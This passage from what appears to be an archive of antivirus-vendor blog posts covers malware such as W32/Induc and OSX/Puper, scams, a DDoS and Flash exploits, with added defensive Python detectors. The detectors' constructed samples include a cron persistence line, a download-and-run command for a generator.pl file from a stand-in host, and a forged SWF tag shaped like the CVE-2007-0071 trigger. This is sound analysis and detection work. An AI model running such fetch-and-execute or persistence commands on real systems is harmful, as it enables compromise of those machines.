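DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{1,8})$')   # "Name"=dword:00000001


def parse_reg_export(text: str) -> dict:
    """Return {key_path: {value_name: int}} for the DWORD values in a .reg dump (lower-cased)."""
    result, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1).lower()
            result.setdefault(current, {})
            continue
        m = DWORD_RE.match(line)
        if m and current is not None:
            result[current][m.group(1).lower()] = int(m.group(2), 16)
    return result


def find_lockdown_policies(reg_text: str) -> list:
    """List every suspect policy value that is set to a non-zero DWORD."""
    findings = []
    parsed = parse_reg_export(reg_text)
    for key, values in SUSPECT_VALUES.items():
        present = parsed.get(key, {})
        for name, meaning in values.items():
            if present.get(name, 0) != 0:
                findings.append(f"{meaning}: {key}\\{name} = {present[name]}")
    return findings


# Constructed sample resembling `reg export` output from a host showing the QTaskMgr-1 symptoms.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
"DisableLockWorkstation"=dword:00000001
"DisableChangePassword"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU]
"NoAutoUpdate"=dword:00000001
"""

if __name__ == "__main__":
    for finding in find_lockdown_policies(SAMPLE_REG):
        print(finding)
```

    On a real host, export the two keys with `reg export` and feed the file’s text to `find_lockdown_policies`; `reg export` normally writes UTF-16, so open the file with that encoding. A clean machine produces no findings because these values are absent or zero by default; each finding names the exact value to delete or zero once the Trojan itself has been removed.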

    Journal: Emerging Standards, Technology Will Relieve Audit Fatigue

    There is a light at the end of the tunnel—risk and compliance technologies and standards are relieving auditors and businesses in this age of increased electronic accountability. On the heels of our integration of SolidCore’s technology, researchers from McAfee Avert Labs have laid out the compliance challenges facing organizations, and the new standards that can save thousands of hours, in the latest edition of the McAfee Security Journal.

    Organizations Suffer from Audit Fatigue

    Of the many compliance obstacles facing organizations, the sheer volume of audits is perhaps the most oppressive impediment to returning to “business as usual.” With more than 400 separate sets of requirements in force internationally, a global institution can face more than 40 distinct mandates. Failure or noncompliance is not an option: reputational damage and the penalties levied by regulatory agencies can have severe financial consequences for businesses.

    In a McAfee-sponsored survey, one organization estimated that to prepare for its PCI audit it spent 1,000 hours in one week configuring audit settings. Another spent more than 18,000 hours preparing for external audits in one year. Even when faced with such overwhelming compliance demands, more than 51 percent of organizations surveyed still used spreadsheets to run audits.

    Three Steps to a Better Audit

    Organizations that embrace IT as the path to solving compliance issues should follow three key steps to combat audit fatigue:

    1. Establish a governance committee: By connecting executives with operational realities, a governance committee can help focus compliance spending where it will be used to its fullest
    2. Automate the IT audit process: By investing in risk evaluation and auditing technology, companies can automate the vast majority of once-manual, time-consuming tasks, better ensuring ongoing compliance and reserving IT energy and spending for strategic priorities
    3. Adopt a well-built framework: By adhering to a consistent framework throughout an organization, IT can consolidate the number of separate audits it must conduct

    SCAP Leads the Way in Next-Generation Audit Standards

    The emergence of the Security Content Automation Protocol (SCAP) signals a change in traditional risk and compliance architecture. Using SCAP-compliant products, companies can now eliminate the need for vendors to issue updates when new policy or regulatory mandates are decreed. By immediately integrating new changes in policy, SCAP improves vulnerability detection, asset management, risk monitoring and response, threat publishing, and more. As more technologies support the continuing evolution of audit demands and evolving infrastructures, the more automated the audit process will become.

    To learn more about McAfee’s insights into the status of risk and compliance technologies, read the newest edition of the McAfee Security Journal.

    Induc Virus Abuses Delphi Compiler

    The W32/Induc virus has been in the wild for at least a year. During this period it has succeeded in infecting a lot of Delphi installations, including manufacturers of some pretty popular software packages.

    On a victim’s machine this virus searches for specific versions (4.0, 5.0, 6.0, and 7.0) of the Delphi compiler. The virus gathers this information from the registry entry below.

    Registry location to find the Delphi version

    If it finds one of these versions, the virus inserts its code into the file SysConst.pas, which lives in x.0\Source\rtl\sys. The virus renames the current SysConst.dcu, found under the Delphi library folder, to SysConst.bak. The SysConst.pas file containing the viral code (like the one shown below) is compiled using the Delphi command-line compiler dcc32.exe to create an infected SysConst.dcu. The original SysConst.pas file is then deleted. Because SysConst is part of the run-time library linked into practically every Delphi program, every application built with that installation from then on carries the virus.

    Viral Code

    McAfee detects all files that have been compiled with the infected Delphi program as W32/Induc. Some customers have contacted us suspecting that this result is a false positive, but this is known correct detection from McAfee.

    This virus does not have a malicious payload. It just spreads through the compiled executables.
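    A developer who wants to know whether a Delphi installation is the one producing the detected binaries can look for the traces described above without touching the binaries at all. The following added example (ours, not McAfee’s detection) checks a Delphi root directory for a leftover SysConst.bak, a SysConst.dcu that no longer matches it, and a deleted SysConst.pas. The paths assume the stock layout (<root>\Lib and <root>\Source\rtl\sys); the timestamp comparison is an extra heuristic of ours that the post does not mention, and the sample installation the script builds for its demo is constructed.

```python
"""Check a Delphi 4-7 installation root for the traces W32/Induc leaves behind.

Added example, not McAfee's detection logic. The first two checks follow the
post: the virus renames Lib\SysConst.dcu to SysConst.bak, compiles a patched
SysConst.pas into a new SysConst.dcu, and deletes the .pas. The timestamp
check is an added heuristic. Paths assume the stock installation layout.
"""
import hashlib
import os
import tempfile
import time
from pathlib import Path


def sha256(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def check_delphi_root(root) -> list:
    """Return indicator strings for one Delphi root; an empty list means nothing was found."""
    root = Path(root)
    lib = root / "Lib"
    dcu, bak = lib / "SysConst.dcu", lib / "SysConst.bak"
    pas = root / "Source" / "rtl" / "sys" / "SysConst.pas"
    findings = []

    # 1. The backup the virus makes of the clean unit before replacing it.
    if bak.exists():
        findings.append(f"backup of original unit present: {bak}")
        if dcu.exists() and sha256(dcu) != sha256(bak):
            findings.append("SysConst.dcu differs from SysConst.bak (unit was replaced)")

    # 2. The source file the virus deletes after recompiling. (Editions shipped
    #    without RTL source would trip this alone, so weigh it with the others.)
    if dcu.exists() and not pas.exists():
        findings.append(f"SysConst.pas missing while SysConst.dcu exists: {pas}")

    # 3. Added heuristic: a stock install's .dcu files share a release date, so a
    #    SysConst.dcu much newer than every sibling was rebuilt on this machine.
    if dcu.exists():
        siblings = [p for p in lib.glob("*.dcu") if p.name.lower() != "sysconst.dcu"]
        if siblings and dcu.stat().st_mtime > max(p.stat().st_mtime for p in siblings) + 3600:
            findings.append("SysConst.dcu is newer than every other unit in Lib")
    return findings


def make_sample_install(root: Path, infected: bool) -> None:
    """Constructed fixture: a minimal Delphi-like tree, optionally carrying Induc's traces."""
    lib, src = root / "Lib", root / "Source" / "rtl" / "sys"
    lib.mkdir(parents=True)
    src.mkdir(parents=True)
    release = time.time() - 5 * 365 * 86400          # pretend the units were built years ago
    for name in ("SysConst.dcu", "Classes.dcu", "SysUtils.dcu"):
        unit = lib / name
        unit.write_bytes(b"clean compiled unit " + name.encode())
        os.utime(unit, (release, release))
    (src / "SysConst.pas").write_text("unit SysConst;\ninterface\nimplementation\nend.\n")
    if infected:
        (lib / "SysConst.dcu").rename(lib / "SysConst.bak")
        (lib / "SysConst.dcu").write_bytes(b"recompiled unit with viral code")   # mtime = now
        (src / "SysConst.pas").unlink()


def demo() -> tuple:
    """Run the check against a constructed clean tree and a constructed infected tree."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, infected = Path(tmp) / "Delphi7_clean", Path(tmp) / "Delphi7_infected"
        make_sample_install(clean, False)
        make_sample_install(infected, True)
        return check_delphi_root(clean), check_delphi_root(infected)


if __name__ == "__main__":
    for label, hits in zip(("clean", "infected"), demo()):
        print(label, "->", hits or "nothing found")
```

    Point `check_delphi_root` at the RootDir recorded in the registry for each installed version. Cleaning means restoring SysConst.bak over the infected SysConst.dcu and SysConst.pas from installation media, then rebuilding every project; a single indicator is worth confirming by hand, since a Standard edition without RTL source trips check 2 on its own.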

    Scammers Love Your Money

    We generally classify as scams email messages that pretend to come from a family member of an (often African) dignitary or from a desperate young woman. In the first case, the sender sometimes explains that following the death of an influential dignitary a large sum of money is blocked in a bank account somewhere. With the recipient’s help, and using his or her financial backing for a money transfer, it would supposedly be possible to release the money. Substantial compensation is offered to whoever agrees. In the second case, the unknown beauty befriends the victim and suddenly has a terrible money problem.

    For some individuals, these swindles, called advance fee fraud (also known as 419 fraud) and romance scams, are a primary source of revenue. They also employ lottery and fake prize scams.

    In Eastern Europe the senders remain discreet and hide their wealth. But in some African countries, such as the Ivory Coast, many crooks work openly. After reading a news item on this subject at the France24 Observers website, I searched the French Skyrock social networking platform and discovered photos and videos of their exploits. Each crook has his own blog entries and is attached to a gang web page where each member is listed in a friends list. They are plenty boastful. Among the group names, we have:

    • les banquiers arabes (the Arab bankers)
    • la banque africaine (the African bank)
    • les boucantiers de la Cote d’Ivoire (the Ivory Coast boucantiers)
    • les plus riches (the richest)
    • etc.

    Here is one example:

    According to 419 AFF, losses from advance fee fraud in 2007 by companies and individuals reached US$4.3 billion.

    In France, one naive victim recently lost €1 million!

    Last year, Janella Spears of Oregon is reported to have lost $400,000 (£270,000) after falling under the spell of one such criminal. Here is her account:

    The naive are numerous, and cybercriminals know it. We must remain vigilant.

    Introducing the IEEE Industry Connections Security Group

    Agreement and collaboration have been two of the greatest challenges the security community has faced from the very beginning. In an effort to address this, The Industry Connections Security Group (ICSG), a new offering from the IEEE, allows like-minded companies to come together to solve industry or business problems that center on information security. Industry Connections is a program under the IEEE that allows for a fast start-up toward industry collaboration. It also offers the support and infrastructure of an established and well known brand—the IEEE itself. This effort will allow the group to focus on the work of security standards and problem solving, rather than being slowed down with issues such as incorporation or intellectual property matters. McAfee is proud to be a founding member of this effort.

    The ICSG is a group of computer security organizations that will work together on common goals and industry issues. The key focus of our collaboration is to solve security issues. In the past few years, attackers have shifted from mass distribution of a small number of threats to micro-distribution of millions of distinct threats. ICSG was established, under the umbrella of the IEEE Standards Association (IEEE-SA) Industry Connections program, out of the desire of many of us in the security industry to pool our experience and resources in response to the systematic and rapid rise in new malware. The bad actors have been able to leverage the underground economy and scale their efforts; they have access to specialist tools and services, and they collaborate and communicate effectively, whereas the security industry has generally responded to threats as individual entities.

    Although there has been some ad-hoc cooperation in the industry in areas such as malware and phish URL sharing, this cooperation has not been standardized or documented in a format that lends itself to systematic improvement in operational efficiency or visibility, or review by people outside the vertical industries. It is this collaborative and communicative gap that the ICSG looks to close. ICSG has been established to look at and deal with a wide variety of security issues in a forum that allows us to engage all types of industry verticals. We also anticipate that we can work with other efforts to help drive security standards in other areas.

    ICSG currently has one team, the Malware Working Group, looking at malware, but the organization will add more as needs evolve. Malware growth has been meteoric for the last several years. As such, the Malware Working Group’s primary goal is to solve some of the malware-related issues the industry faces today. The initial focus will be to establish more intelligent ways of sharing malware samples and the information associated with them to make the computer security industry more effective at combating this ever-evolving threat.
    The initial members of ICSG are McAfee, Microsoft, Symantec, Sophos, AVG, and Trend Micro. A number of other individuals from a variety of computer security companies have been involved in reviewing the initial document produced by the Malware Working Group. If you are looking to join or need information, contact us at:

    • joinICSG@ieee.org, joinICSGMal@ieee.org, IndustryConnections@ieee.org

    Procedures and policies that have been adopted can be viewed here. Information about the Malware Working Group can be found here.

    Collateral Damage

    Twitter, LiveJournal, Facebook, YouTube, Fotki: what do they have in common? They all hosted an account of a pro-Georgian blogger who went under the nickname cyxymu (after Sukhumi, the capital of Abkhazia, one of Georgia’s pro-Russian breakaway republics and the city he professed to have fled in 1993 during the republic’s war with Georgia). And they all suffered a distributed denial-of-service (DDoS) attack during the course of the day yesterday, an attack that took down Twitter for several hours and significantly slowed connectivity to Facebook. Reportedly, the attack packets sent to the targeted social-media sites were requests for the pages hosted for this user, who had just a few days earlier blogged about the upcoming one-year anniversary of the war between Georgia and Russia.

    In addition to the web-based DDoS attacks, McAfee’s TrustedSource reputation system also detected a spam campaign that referenced the targeted blogs. We believe this campaign had a dual purpose. First, the attackers spoofed the blogger’s Gmail address as the sender of the spam; as a result, his inbox was flooded with out-of-office notifications and vacation bounces sent automatically by the mail systems of people who had received it. This was likely part of an intimidation campaign designed to tell cyxymu who the real target of the DDoS was. Second, the spam contained links to the blogger’s sites, with the likely goal of bringing even more traffic to bear on those servers than the DDoS alone would have.


    Screenshot of the spam bounces in cyxymu’s mailbox that he had posted after the attack on abkhaziya.net, one of his backup blog sites

    In our analysis, the spam appears to have been distributed, at least partially, by the same botnet as the one that was used for the DDoS. Of the infected machines spreading the spam, 29 percent were located in Brazil, 9 percent in Turkey, and 8 percent in India.

    We detected two distinct spam runs that began around 8 a.m. EDT on Thursday, August 6 and started winding down around 11 a.m. the same day, with the last messages being detected at 4 p.m. Only the second spam run, the larger of the two, spoofed cyxymu’s email address, while the first one randomized the senders’ email addresses.

     

    URLs that were attacked include:

    http://twitter.com/cyxymu
    http://www.youtube.com/Cyxymu
    http://www.facebook.com/cyxymu
    http://cyxymu.livejournal.com
    http://cyxymu1.livejournal.com
    http://fotki.com/cyxymu

    The IP addresses included in the attacks were detected proactively by McAfee’s TrustedSource as having a malicious reputation.

    Q2 Threats Report Released–It’s All About Botnets and Spam

    Today we released our Q2 Threats Report. Some old trends have continued. Some new trends and threats have been established, and some old “friends” have even outdone themselves. Spam volumes have increased 141 percent since March, continuing the longest ever streak of increasing spam volumes. We also highlight the dramatic expansion of botnets and the threat from AutoRun malware.

    More than 14 million computers have been enslaved by cybercriminal botnets, a 16 percent increase over the previous quarter. The report confirms our first-quarter prediction that the surge in botnet growth would send spam levels to new heights, surpassing their previous peak of October 2008, just before the takedown of the spam-hosting ISP McColo.

    Our researchers also found that over the course of 30 days AutoRun malware had infected more than 27 million files. AutoRun malware, which abuses Windows’ AutoRun feature, needs no user click to activate and is most often spread through USB sticks and other portable storage devices. Its detection rate surpasses even that of the infamous Conficker worm by 400 percent, making AutoRun one of the most prevalent pieces of malware in the world.

    Some of the other areas we cover and discuss:

    Cybercrime as a Service
    As the number of botnets continues to grow, malware writers have begun to offer malicious software as a service to those who control these bots. By exchanging or selling resources, cybercriminals distribute new malware to wider audiences instantaneously. Programs like Zeus–an easy-to-use Trojan creation tool–continue to make the creation and management of malware even easier.

    Cybercriminals Target Twitter, Social Networks
    Twitter’s growth in popularity has made it a new target for cybercriminals in the last three months. Malware like the “Mikeey” worm and new variations of the Koobface Trojan attack users through tweets and abbreviated URLs. Spam Twitter accounts are becoming increasingly prevalent. Twitter administrative accounts have also been hacked on multiple occasions, giving cybercriminals access to the private accounts of celebrities and politicians, such as Britney Spears and Barack Obama and even allowing for the publication of sensitive internal strategy documents on the Web. Facebook and MySpace remain strong attack vectors for cybercriminals. In May, spam messages on social networks pointed users to more than 4,000 new Koobface binaries!

    To view the McAfee Q2 Threats Report, go here.

    Counting Badness

    Following up on the recent post by my colleague Dave Marcus concerning malware growth, the guys from AV-Test in Germany just released their updated stats. To avoid confusion when comparing the different numbers, here’s a quick explanation of the different counts:

    AV-Test counts unique binaries. Unique means different cryptographic hashes. So the same Trojan, obfuscated with 10 different packers, results in 10 unique binaries. This is often due to server-side polymorphism, where you get a unique binary every time you download the file.

    Our outbound counting, as used by Marcus, counts the threats for which we have to create a driver for detection. If in the example above we are able to look beneath the obfuscation layer of the packers, the 10 different binaries would be counted as just one Trojan. In addition to that, we frequently use generic detection, in which a single count could hit on thousands of minor variants.

    Now that the different ways of counting may be a bit clearer, let’s look at the bad news:

    AV-Test’s count has come close to 22,000,000 samples in June.


    This by itself is disturbing, but the really disturbing trend is visible when we look at the growth month over month:


    The growth had been fairly constant over the last year, but that has changed.

    We are now seeing a major increase in monthly growth, topping one million new samples each month in AV-Test’s count. And this time it is not only samples (the same piece of malware packed over and over again) but also genuinely new malware. Look at Marcus’ numbers again: growth in 2009 has nearly tripled compared with 2008, and remember that we count malware rather than samples. This indicates a recent shift in malware production: tons of new Trojans have been developed and released on top of the reused stuff.

    So keep your machine updated, not just AV and the OS but all applications. Watch out where you surf. (SiteAdvisor may help you there.) And take care what links or attachments you trust in emails and all other forms of messages. All this will help you enjoy the summer!

    Malware From Celebrity Video: But I Thought I Just Installed a Video Player!

    Erin Andrews is a popular ESPN sports reporter in the United States who recently made headlines outside the sports arena. In an unfortunate case of privacy invasion, a video purportedly capturing private moments of the reporter through a hotel room peephole was released on the Internet. The video generated a considerable amount of news.

    In our world of anti-malware we follow a simple formula: “Media + Celebrity = Watch out for malware.” Whether you are an eager fan or just someone surfing the web for news, beware. An Internet search with the right keywords on your favorite search engine can easily lead you to malware. In the case below, it led us to a malicious website hosted at [removed].report-cnn.com/[removed].

    Fake Video Message

    Although it was made to look like a real one, this website is NOT related to CNN. At the time of research it was still live and distributing malware using the “you need a video player” technique that has been used repeatedly in similar attacks. The user is enticed with an attractive video but told that a new video player program must be installed first.

    The victim clicks a link that downloads and installs an executable program, which in turn installs the malware. This is usually followed by a pop-up message reporting that the downloaded video player is corrupted!

    Install Video Player Message

    The current case comes with a slight twist. The option to download the “video player” is offered only if Adobe Flash is already installed. This first step lets users view some initial pictures, as if they were browsing legitimate news content on the site. It then entices them to view the “live video” by installing a video player, which instead contains the malware. Once the malware is downloaded, a video is actually streamed to the user from an external Google link. That link, of course, has nothing to do with the downloaded video player, so gullible users would believe that running the downloaded program enabled them to view the video.

    This malicious website recognizes the target operating system by checking the User-Agent header sent to the web server by the browser. In our tests, a .exe file was delivered to a Windows-based browser while a .dmg file was delivered to Mac OS-based browsers.

    Downloaded Files

    The malware downloaded from this site is currently detected as FakeAlert-DA and FakeAlert-EL. For Mac OS users, the MediaPlayer.dmg malware is detected as the OSX/Puper.a Trojan. In other related cases, we are currently detecting the payloads as Generic FakeAlert.a and Generic FakeAlert.c.

    We advise Internet users to refrain from installing programs that are linked to hot news and media sites.

    Network Security Defeats Microsoft Video ActiveX Exploit

    As a follow-up to our two recent blogs, we want to provide some details for this zero-day exploit from the perspective of the McAfee Network Security Platform (formerly known as IntruShield).

    Unlike traditional ActiveX exploits, in this case the Microsoft Video ActiveX controls are being used to load malicious image files and trigger the vulnerability. McAfee Network Security Platform detects this exploit attempt using the attack signature HTTP: Vulnerability in Microsoft Video ActiveX Control Could Allow Remote Code Execution. At this point, we have seen active attempts in the wild trying to exploit this vulnerability. Figure 1, below, shows one such attempt as viewed on the Alert Viewer and Figure 2, bottom, shows the corresponding packet capture from the evidence report.

    Exploit Attempt Alert
    Figure 1. Exploit attempt alert

    Packet Capture from Evidence Report
    Figure 2. Packet capture from evidence report

    Microsoft Security Advisory 972890 says customers can set the kill bit for a list of Class Identifiers (CLSIDs). Any attempt to use these CLSIDs for exploitation can be detected using the audit signatures HTTP: Potential Harmful Microsoft Video ActiveX Control I, HTTP: Potential Harmful Microsoft Video ActiveX Control II, and HTTP: Potential Harmful Microsoft Video ActiveX Control III.

    All of the attack signatures described above were released on July 6 in the following network security signature sets.
    • 5.1.22.14
    • 4.1.52.14

    Variant of Mac Malware Another Party Puper

    We recently received a new sample of the Mac malware OSX/Puper.a. This file [MD5 Sum: 428143005E07E510302BA431FE0C28CC], which disguises itself as a Mac Cinema Installer, was recently mentioned in PC Magazine.

    When the DMG file is opened and the installer inside it is run, it displays the following message:

    As the installation continues, the malware is installed on the machine with root privileges. Below is a screenshot of the malware after installation:

    The file AdobeFlash in the screenshot above is the malicious script. It is obfuscated with uuencode and looks like this before decoding:

    And like this after decoding:

    From the shot above we can see another set of obfuscated code after the scheduled-task instructions. We can also see that the malware creates a scheduled job to run itself once every five hours, as shown below:

    Decoding the rest of the script reveals the following:

    From the screen above we see that the malware downloads the file generator.pl and executes it.

    Although the amount of Mac malware remains tiny compared with the amount written for Microsoft Windows, new variants such as this one remind us to be careful.
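    Peeling nested uuencode by hand, as done in the screenshots above, gets tedious with every new variant. Here is an added example (ours, not McAfee’s tooling) that decodes every begin/end block it finds, repeats on whatever comes out, and then reports the two indicators an analyst wants from a script like this one: crontab schedules and download URLs. The sample it runs on is constructed to mirror the structure described in the post, a cron job followed by a second obfuscated stage that fetches generator.pl; example.com stands in for the real download host.

```python
"""Peel the uuencoded layers of a script like OSX/Puper's AdobeFlash file and pull
out what an analyst wants from each layer: crontab schedules and download URLs.

Added example, not McAfee's analysis tooling. The sample at the bottom is
constructed to mirror the structure the post describes (cron job, then a second
obfuscated stage that fetches generator.pl); example.com stands in for the real
host. Decoding uses Python's binascii, so it runs offline on any platform.
"""
import binascii
import re

BEGIN_RE = re.compile(r"^begin\s+[0-7]{3,4}\s+(\S+)\s*$")
# five crontab schedule fields, then the command (stops at a quote, pipe or newline)
CRON_RE = re.compile(r'(?<![\w*/,-])((?:(?:\*|\d+)(?:/\d+)?(?:,\d+)*\s+){5})([^\n"|]+)')
URL_RE = re.compile(r"https?://[^\s\"'|;)]+")


def split_uu(text: str):
    """Separate a script into its plain lines and its uuencoded blocks: (text, [(name, bytes)])."""
    plain, blocks, name, buf = [], [], None, []
    for line in text.splitlines():
        if name is None:
            m = BEGIN_RE.match(line)
            if m:
                name, buf = m.group(1), []
            else:
                plain.append(line)
        elif line.strip() == "end":
            blocks.append((name, b"".join(buf)))
            name = None
        elif line.strip():
            try:
                buf.append(binascii.a2b_uu(line.encode("latin-1")))
            except binascii.Error:
                pass                        # junk line inside a block: skip it, keep going
    return "\n".join(plain), blocks


def peel(script: str, max_depth: int = 8) -> list:
    """Return the plain (non-uuencoded) text of every layer, outermost first."""
    layers, pending = [], [script]
    for _ in range(max_depth):
        if not pending:
            break
        next_layer = []
        for text in pending:
            plain, blocks = split_uu(text)
            layers.append(plain)
            next_layer += [data.decode("latin-1") for _, data in blocks]
        pending = next_layer
    return layers


def analyze(script: str) -> dict:
    """Count the layers and collect cron entries and URLs from all of them."""
    layers = peel(script)
    cron = [(m.group(1).strip(), m.group(2).strip())
            for layer in layers for m in CRON_RE.finditer(layer)]
    urls = sorted({u for layer in layers for u in URL_RE.findall(layer)})
    return {"layers": len(layers), "cron": cron, "urls": urls}


def uuencode(name: str, data: bytes) -> str:
    """Build a uuencoded block; used here only to construct the sample below."""
    lines = ["begin 755 " + name]
    for i in range(0, len(data), 45):
        lines.append(binascii.b2a_uu(data[i:i + 45], backtick=True).decode("ascii").rstrip("\n"))
    return "\n".join(lines + ["`", "end"])


# Constructed three-stage sample: outer script -> stage1 (cron job + another uuencoded
# block) -> stage2 (downloads and runs generator.pl). Not the real Puper script.
STAGE2 = b"#!/bin/sh\ncurl -s -o /tmp/generator.pl http://example.com/generator.pl\nperl /tmp/generator.pl\n"
STAGE1 = ("#!/bin/sh\n"
          'echo "0 */5 * * * /Library/Internet Plug-Ins/AdobeFlash" | crontab -\n'
          "uudecode -o /tmp/stage2 <<'EOF'\n" + uuencode("stage2", STAGE2) + "\nEOF\nsh /tmp/stage2\n")
SAMPLE = ("#!/bin/sh\nuudecode -o /tmp/stage1 <<'EOF'\n"
          + uuencode("stage1", STAGE1.encode("latin-1")) + "\nEOF\nsh /tmp/stage1\n")

if __name__ == "__main__":
    print(analyze(SAMPLE))
```

    Scanning only the plain text of each layer, rather than the raw script, matters: uuencoded lines are built from the same printable characters as shell code and would otherwise produce false cron and URL matches. The same peel-then-scan loop applies to any nested encoding once `split_uu` is swapped for the right decoder.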

    SWF Flash Exploits: Old Wine in a New Bottle

    Adobe Flash applications have been a major security concern during the past couple of years. The large number of published Flash vulnerabilities, coupled with the player’s popularity and wide distribution, makes Flash files an attractive target for cybercriminals. Infected banner ads are nothing new; these Flash-based “malvertisements” have plagued ad servers and popular websites for a very long time.

    A malicious Flash file can be crafted to contain an image or an animation to fool unsuspecting users into believing the file is legitimate. Lately, we have observed a spike in the number of websites hosting malicious flash files that exploit the integer-overflow vulnerability in the DefineSceneAndFrameLabelData tag. These are popularly known as Exploit-CVE2007-0071.

    Although the vulnerability was fixed some time ago, the bad guys keep coming up with new mechanisms to evade detection.

    Flash Player 9 and later comes with a new virtual machine, ActionScript Virtual Machine 2 (AVM2), designed to execute programs written in ActionScript 3.0. ActionScript 3.0’s Loader class provides a method called loadBytes().

    The flash.display.Loader class supports the loadBytes method, which takes a byte array to fill the loader with data. The injected bytes can be a GIF, JPG, PNG, or SWF file. Embedding the exploit SWF (small web format) file inside a loader SWF gives attackers a multifold advantage: it ensures successful exploitation while complicating analysis for researchers.

    The image above shows the embedded malicious SWF file inside the loader file. This loader uses the loadBytes method to inject the bytes into the security context of the application.

    In recent versions of the exploit, the embedded SWF file is encrypted using various obfuscation techniques such as byte-shifting algorithms or random XOR keys, as shown in the figure below.

    We expect this trend to continue as cybercriminals target low-hanging fruit such as widely deployed applications, and Flash is no exception. As always, make sure you are protected and that Flash Player is updated to the latest version. Happy surfing :) .
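    Both tricks described above leave static marks in the file that a scanner can look for without running the SWF: a DefineSceneAndFrameLabelData tag whose scene count is larger than the tag could possibly hold, and a second SWF header sitting inside the outer file (typically in a DefineBinaryData tag) waiting for loadBytes(). The parser below is an added example, ours and not McAfee’s detection logic; the header, RECT, tag-header and EncodedU32 layouts follow the public SWF format specification, and the three sample files it triages are built in code rather than taken from the wild. It also recurses into embedded SWFs, which is the whole point against the loader trick.

```python
"""Static triage of SWF files for the two patterns the post describes: a forged
DefineSceneAndFrameLabelData tag (the CVE-2007-0071 trigger) and a second SWF
embedded for a loadBytes() loader. Added example, not McAfee's detection; format
details follow the public SWF spec and the samples at the bottom are built in code."""
import struct
import zlib

TAG_END, TAG_SHOW_FRAME, TAG_SCENE_DATA, TAG_BINARY_DATA = 0, 1, 86, 87
SIGNATURES = (b"FWS", b"CWS")

def read_encoded_u32(buf: bytes, pos: int):
    """EncodedU32: 7 bits per byte, little-endian, MSB set = another byte follows (max 5)."""
    value, shift = 0, 0
    for _ in range(5):
        b, pos = buf[pos], pos + 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            break
        shift += 7
    return value & 0xFFFFFFFF, pos

def parse_swf(data: bytes) -> dict:
    """Return version, frame count and the (code, body) tag list of one SWF."""
    if data[:3] not in SIGNATURES:
        raise ValueError("not an FWS/CWS file")
    body = zlib.decompress(data[8:]) if data[:3] == b"CWS" else data[8:]
    pos = (5 + 4 * (body[0] >> 3) + 7) // 8              # RECT: 5-bit Nbits, 4 fields, byte-padded
    frame_count = struct.unpack_from("<H", body, pos + 2)[0]   # u16 frame rate precedes it
    pos, tags = pos + 4, []
    while pos + 2 <= len(body):
        code_len = struct.unpack_from("<H", body, pos)[0]
        code, length, pos = code_len >> 6, code_len & 0x3F, pos + 2
        if length == 0x3F:                                 # long form: explicit u32 length
            length, pos = struct.unpack_from("<I", body, pos)[0], pos + 4
        tags.append((code, body[pos:pos + length]))
        pos += length
        if code == TAG_END:
            break
    return {"version": data[3], "frame_count": frame_count, "tags": tags}

def triage(data: bytes, depth: int = 0) -> list:
    """Return findings for one SWF, recursing into embedded SWFs; an empty list means clean."""
    findings, swf = [], parse_swf(data)
    for code, body in swf["tags"]:
        if code == TAG_SCENE_DATA and body:
            scene_count, pos = read_encoded_u32(body, 0)
            # Each scene needs at least an offset byte and a NUL-terminated name, so a count
            # the tag cannot physically hold exists only to overflow the player's allocation.
            if scene_count * 2 > len(body) - pos:
                findings.append(f"DefineSceneAndFrameLabelData claims {scene_count} scenes in a "
                                f"{len(body)}-byte tag (CVE-2007-0071 pattern)")
            elif scene_count > swf["frame_count"]:
                findings.append(f"scene count {scene_count} exceeds frame count {swf['frame_count']}")
        if code == TAG_BINARY_DATA and body[6:9] in SIGNATURES:   # data follows u16 id + u32 reserved
            findings.append("DefineBinaryData carries an embedded SWF (loadBytes loader pattern)")
            if depth < 3:
                try:
                    findings += ["embedded: " + f for f in triage(body[6:], depth + 1)]
                except (ValueError, IndexError, struct.error, zlib.error):
                    findings.append("embedded SWF is malformed or encrypted")
    for sig in SIGNATURES:                                 # headers hidden by other means
        off = data.find(sig, 1)
        while off != -1:
            if off + 8 <= len(data) and 1 <= data[off + 3] <= 64:
                findings.append(f"second SWF header at offset {off}")
            off = data.find(sig, off + 1)
    return findings

# --- constructed samples; these helpers double as a minimal SWF writer ---
def encode_u32(v: int) -> bytes:
    out = bytearray()
    while True:
        out.append((v & 0x7F) | (0x80 if v >> 7 else 0))
        v >>= 7
        if not v:
            return bytes(out)

def tag(code: int, body: bytes = b"") -> bytes:
    if len(body) < 0x3F:
        return struct.pack("<H", (code << 6) | len(body)) + body
    return struct.pack("<HI", (code << 6) | 0x3F, len(body)) + body

def build_swf(tags: list, frame_count: int = 1) -> bytes:
    """Minimal uncompressed SWF v9: empty RECT, 12 fps, the given tags, then End."""
    body = b"\x00" + struct.pack("<HH", 0x0C00, frame_count) + b"".join(tags) + tag(TAG_END)
    return b"FWS\x09" + struct.pack("<I", 8 + len(body)) + body

def to_cws(data: bytes) -> bytes:
    """Re-wrap an FWS file as zlib-compressed CWS (same 8-byte header, compressed body)."""
    return b"CWS" + data[3:8] + zlib.compress(data[8:])

def scene_tag(scene_count: int) -> bytes:
    return tag(TAG_SCENE_DATA, encode_u32(scene_count) + encode_u32(0) + b"Scene 1\x00" + encode_u32(0))

BENIGN = build_swf([scene_tag(1), tag(TAG_SHOW_FRAME)])
OVERFLOW = build_swf([scene_tag(0x7FFFFFFF), tag(TAG_SHOW_FRAME)])
NESTED = build_swf([tag(TAG_BINARY_DATA, struct.pack("<HI", 1, 0) + OVERFLOW), tag(TAG_SHOW_FRAME)])

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("overflow", OVERFLOW), ("nested", NESTED)):
        print(name, triage(sample) or "clean")
```

    The plausibility check on the scene count is deliberately structural rather than a fixed threshold: a legitimate tag must physically contain an offset and a name for every scene it declares, so the check keeps working however the attacker tunes the count. The second-header sweep is what catches the loader variants from the last paragraph, where the inner SWF is XOR-ed or byte-shifted; the raw bytes no longer start with FWS, so only the ActionScript that decodes them gives it away, and a file whose DefineBinaryData payload fails to parse is reported as such rather than silently passed.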

